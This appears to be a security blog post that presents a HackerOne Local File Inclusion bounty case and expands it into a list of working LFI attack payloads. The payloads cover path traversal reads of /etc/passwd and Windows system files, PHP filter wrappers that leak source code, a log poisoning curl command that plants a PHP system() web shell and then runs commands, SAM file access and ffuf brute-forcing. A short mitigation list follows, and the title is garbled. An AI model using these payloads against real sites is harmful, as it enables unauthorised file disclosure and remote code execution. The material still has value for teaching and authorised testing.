Exploiting LFI Vulnerability: A 00 Bounty Case Study

By /

Listen to this Post

Featured Image
In a recent HackerOne report, a security researcher earned a $600 bounty by exploiting a Local File Inclusion (LFI) vulnerability using the payload:

//c:%2fwindows%2fwin.ini

This technique allowed access to sensitive system files, demonstrating the risks of improper input validation.

You Should Know: LFI Exploitation Techniques

1. Basic LFI Payloads

Access common files on Windows/Linux:

http://vulnerable-site.com/page.php?file=../../../etc/passwd 
http://vulnerable-site.com/page.php?file=//c:/windows/system.ini

2. PHP Wrapper Exploits

Use PHP filters to leak source code:

http://vulnerable-site.com/page.php?file=php://filter/convert.base64-encode/resource=index.php

Decode the output with:

echo "PD9waHA..." | base64 -d

3. Log Poisoning

Inject PHP code into log files (e.g., Apache/Nginx):

curl -X GET "http://vulnerable-site.com/page.php?file=/var/log/apache2/access.log" -H "User-Agent: <?php system($_GET['cmd']); ?>"

Then execute commands via:

http://vulnerable-site.com/page.php?file=/var/log/apache2/access.log&cmd=id

4. Windows-Specific Tricks

  • Access SAM database (if privileges allow):
    //c:/windows/repair/sam
  • Read IIS configuration:
    //c:/windows/system32/inetsrv/config/applicationHost.config

5. Automation with ffuf

Brute-force common paths:

ffuf -u "http://vulnerable-site.com/page.php?file=FUZZ" -w /usr/share/seclists/Fuzzing/LFI/LFI-Linux.txt

What Undercode Say

LFI vulnerabilities remain a critical threat, especially when combined with other weaknesses like directory traversal or log injection. Always:
– Sanitize user input using allowlists.
– Disable dangerous PHP wrappers (php://, expect://).
– Use chroot/jail mechanisms where possible.
– Monitor file access patterns in logs.

Expected Output:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Prediction

As web applications grow more complex, LFI vulnerabilities will increasingly intersect with cloud storage misconfigurations (e.g., accessing AWS instance metadata via SSRF+LFI). Researchers should explore hybrid attack vectors in 2024.

Reference: HackerOne Report

References:

Reported By: Alhasan Abbas – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Related Posts: